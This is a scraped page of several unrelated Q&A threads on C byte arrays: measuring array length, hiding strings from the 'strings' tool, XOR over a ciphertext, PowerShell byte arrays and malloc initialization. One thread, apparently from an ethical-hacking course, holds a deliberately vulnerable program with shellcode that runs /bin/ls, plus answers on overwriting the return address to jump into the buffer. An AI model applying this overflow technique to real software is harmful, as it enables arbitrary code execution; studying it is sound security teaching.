How can I get length of array which is array of unsigned char*?
This is my array:
unsigned char ot[] = { 0x68, 0x65, 0x6c, 0x6c, 0x6f, 0x20, 0x77, 0x6f, 0x72, 0x6c, 0x64, 0x0, 0x0, 0x0, 0x0, 0x0 };
I tried to use strlen() like this:
int length = strlen((char*) ot);
It returns me length of 11 till first 0x0, but what is my array changes to this? (check last element)
unsigned char ot[] = { 0x68, 0x65, 0x6c, 0x6c, 0x6f, 0x20, 0x77, 0x6f, 0x72, 0x6c, 0x64, 0x0, 0x0, 0x0, 0x0, 0xa1 };
Then I get still 11 elements, how can I get "real" length of whole array? Like what if there will be data after some 0x0 element.
For example for:
unsigned char* file_buffer = new unsigned char[BUFFER_SIZE];
fread(file_buffer,sizeof(unsigned char),BUFFER_SIZE,input_file)
What could be best solution? Because return value of fread() can vary, if I am reading last chunk of file, and what if in file will be 0x0 before some data?
How can I get length of array which is array of unsigned char* ?
According to the examples you gave you are attempting to retrieve the length of an array [] and not an array *. This can be achieved using the keyword sizeof (sizeof(ot)).
However when it comes to pointers (such as your unsigned char *), you will need to know the size beforehand as using sizeof over it would return the allocated size of the pointer itself and not the actual content size of this pointer.
unsigned char ot[] = {0x68, 0x65, 0x6c, 0x6c, 0x6f, 0x20, 0x77, 0x6f, 0x72, 0x6c, 0x64, 0x0, 0x0, 0x0, 0x0, 0x0};
int _length = strlen((char *) ot);
printf("%d\n", _length); // 11
int length = sizeof(ot) / sizeof(unsigned char);
printf("%d\n", length); // 16
// reason behind strlen behaves like this
if (0x0 == '\0') {
printf("Yes\n");
}
strlen() returns string length when it finds null terminator which is '\0'. If you run the code, it will print Yes at the end, means 0x0 is actually equivalent to '\0' null terminator.
Use sizeof() to get the real length.
Related
So, I have been developing a code where some information should not be easily found if someone runs a strings command against the binary ie: strings a.out
If I try to use the following:
char array1[] = { 'd', 'd', 'd', 'd', '\0' };
then it works perfectly fine and it wouldn't be displayed if I run the strings command against the binary file.
However, I have a bigger list of text, which is converted to hex and if I try to use this list in the code below, after I compile the code, if I run a strings command against the binary, the list will be easily displayed in plain text.
unsigned char array1[] = {
0x64, 0x64, 0x64, 0x64, 0x20, 0x61, 0x61, 0x61, 0x61, 0x0a, 0x62, 0x62,
0x62, 0x62, 0x20, 0x63, 0x63, 0x63, 0x63, 0x64, 0x0a
};
My goal here is not to encrypt anything, but just try to avoid the content from being easily displayed if someone runs the strings command against the binary.
does anyone have any idea?
My idea is using float to store the value to used in initialization and converting the values to unsigned char at run time.
float array1_f[] = {
0x64, 0x64, 0x64, 0x64, 0x20, 0x61, 0x61, 0x61, 0x61, 0x0a, 0x62, 0x62,
0x62, 0x62, 0x20, 0x63, 0x63, 0x63, 0x63, 0x64, 0x0a
};
unsigned char array1[sizeof(array1_f) / sizeof(*array1_f)];
for (size_t i = 0; i < sizeof(array1) / sizeof(*array1); i++) {
array1[i] = (unsigned char)array1_f[i];
}
Floating-point values have a different representation compared to integers (for example, the value 0x64 (100) is represented as 0x42c80000 in IEEE-754 32-bit float), so it should be enough to hide your data from strings.
You could use a simplistic cipher in the source file and restore the string at runtime:
#define X(c) (0x60 ^ (c))
char array1[] = {
X('d'), X('d'), X('d'), X('d'), X(' '), X('a'), X('a'), X('a'),
X('a'), X('\n'), X('b'), X('b'), X('b'), X('b'), X(' '), X('c'),
X('c'), X('c'), X('c'), X('d'), X('\n')
};
void init_function(void) {
for (size_t i = 0; i < sizeof(array1); i++) {
array1[i] = X(array1[i]);
}
}
Even simpler if you don't mind the phrase appearing as clear text in the source file:
#include <stddef.h>
wchar_t array1_w[] = L"dddd aaaa\nbbbb ccccd\n";
char array1[sizeof(array1_w) / sizeof(*array1_w)];
void init_function(void) {
for (size_t i = 0; i < sizeof(array1); i++) {
array1[i] = (char)array1_w[i];
}
}
In C you can do something like:
uint16_t datalen = 1024;
uint16_t crc = 0x1021;
uint8_t myHeader = {0x41, 0xBE, 0x21, 0x08, datlen/256, datalen%256, crc/256, crc%256};
Now, how can I accomplish an array initialization like this in Powershell?
I want to send the byte array later to serial port.
Not so different:
[uint16]$datalen = 1024
[uint16]$crc = 0x1021
[byte[]]$myHeader = 0x41, 0xBE, 0x21, 0x08, ($datalen/256), ($datalen%256), ($crc/256), ($crc%256)
This question already has answers here:
How to make bit wise XOR in C
(7 answers)
Closed 5 years ago.
I am trying to implement a cryptographic algorithm in C. I have an unsigned char array;
unsigned char ciphertext[] = { 0xA5, 0xB2, 0x3C, 0xAB, 0x03, 0xF1, 0xD3, 0x1C, 0x7F, 0xAD, 0x37, 0xA8, 0x8C, 0x8B, 0xCD, 0x90, 0xD4, 0xC2, 0x30, 0xAB, 0xD2, 0x3F, 0x3D, 0xAF, 0x58, 0x94, 0x1F, 0x50, 0xAF, 0xA2, 0xCE, 0x01 };
I need to XOR the char array with all values from 1 to 256. How can I do it in C? Thank you in advance.
EDİT:
I want to XOR my char array with;
unsigned char [] = { 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01};
unsigned char two = { 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02};
unsigned char three[] = { 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03};
And so on... That is the reason why I can not xor through each elements. It would be something different.
Something like:
int i;
for (i = 0; i < length; i++) {
cryptotext[i] = ciphertext[i] ^ (i%256);
}
Note that you can use only one array if you don't want to keep you plain text:
ciphertext[i] ^= (i%256);
XOR performs the following operations. please see below.
x y XOR
------------
0 0 0
1 0 1
0 1 1
1 1 0
You can't xor the entire array in one piece. you need to loop through the array and transform it character by character.
perform loop through the array and perform the XOR Operation.
I'm an ethical hacking student and have been given this as an exercise. I've been stuck on it for two days now.
We're writing a program that is purposely vulnerable to a "buffer overflow".
#include <stdio.h>
void badf(int n, char c, char* buffer)
{
char mycode[] = {
0xeb, 0x0f, 0xb8, 0x0b,
0x00, 0x00, 0x00, 0x8b,
0x1c, 0x24, 0x8d, 0x0c,
0x24, 0x31, 0xd2, 0xcd,
0x80, 0xe8, 0xec, 0xff,
0xff, 0xff, 0x2f, 0x62,
0x69, 0x6e, 0x2f, 0x6c,
0x73, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00
}; // 37 bytes
int i;
// Copy mycode array into buffer array
for (i=0; i<n; i++)
{
buffer[i]=mycode[i];
}
// Overwrite Base Pointer
buffer[37] = 0x00;
buffer[38] = 0x00;
buffer[39] = 0x00;
buffer[40] = 0x00;
// Overwrite Instruction Pointer
buffer[41] = 0x90;
buffer[42] = 0x83;
buffer[43] = 0x04;
buffer[44] = 0x08;
}
void f(int n, char c)
{
char buffer[37];
badf(n,c,buffer);
}
void test()
{
printf("test\n");
}
int main()
{
f(37,0x00);
return 0;
}
The mycode array contains "malicious" machine code (it actually just calls execv with /bin/ls). badf is the "vulnerable" function. At the moment you can see I'm overwriting the Base Pointer with 0x00s and the Instuction Pointer with 0x08048390 which is the address of the test() function. This works, 'test' is printed to the terminal.
Now my next exercise is to "use ddd to find the address of your code array and modify the C to write this address over the instruction pointer, as you did in the previous step".
What I don't understand, is how I can use ddd to find the address of my code array. I can easily find the address where the array is moved to BP:
0x08048260 <badf+12>: movb $0xeb,-0x29(%ebp)
0x08048264 <badf+16>: movb $0xf,-0x28(%ebp)
0x08048268 <badf+20>: movb $0xb8,-0x27(%ebp)
.....
Or where it is copied into the buffer array:
0x080482f4 <badf+160>: movl $0x0,-0x4(%ebp)
0x080482fb <badf+167>: jmp 0x8048316 <badf+194>
0x080482fd <badf+169>: mov -0x4(%ebp),%edx
0x08048300 <badf+172>: mov 0x10(%ebp),%eax
.....
But of course this is not what we're looking for.
How can I find the Instruction Pointer address to execute machine code that has been loaded in by writing it in the buffer array this way?
edit: ddd is the debugger we're using, also note we're working with a 32bit linux. The code is compiled with -fno-stack-operator flag, disabling the compilers auto-checks for buffer overflows.
Since you copy myCode into the buffer, you could simply use buffer itself:
Assuming a little-endian machine:
// Overwrite Instruction Pointer
buffer[41] = (char)(((uintptr_t)buffer) >> 0);
buffer[42] = (char)(((uintptr_t)buffer) >> 8);
buffer[43] = (char)(((uintptr_t)buffer) >> 16);
buffer[44] = (char)(((uintptr_t)buffer) >> 24);
I don't know how to do it with ddd, but you could modify badf to print mycode address by using a print statement like this:
printf("mycode address: %p", (void *) mycode);
See what that prints, and just write that to instruction pointer
Let's say I've calloc'd some memory for myself:
byte *header = calloc(5 + ZHEADERSIZE, sizeof(byte));
This gives me an array of 0's. But what if I want to make a custom initialization of the memory? The following code is a fairly detailed initialization for an array literal. Note that it actually contains variables, so I can't just memcpy all of the array over. I'm wondering if I can replicate this style of initialization for a block of memory that is malloc'd out without having to insert them manually.
unsigned char zhead[] =
{
0x00, 37, 0, 218, 0xFF,
0x50, 0x4b, 0x03, 0x04,
0x14,
0x00,
0x00, 0x00,
0x08, 0x00,
0x08, 0x03,
0x64, 0x3c,
0xAA, 0xBB, 0xCC, 0xDD,
csize, (csize>>8), 0, 0,
uncsize, (uncsize>>8), 0, 0,
0x07, 0x00,
0x00, 0x00,
'r', '/', 'r', '.', 'z', 'i', 'p'
};
You cannot initialize dynamically allocated memory in C other than to zero using calloc. You can however provide a static prototype array from which you copy the data:
const char prototype[] = { 'a', 'b', 'c' };
int main()
{
char * data = malloc(sizeof prototype);
memcpy(data, prototype, sizeof prototype);
data[1] = 'z'; // fill in custom data
}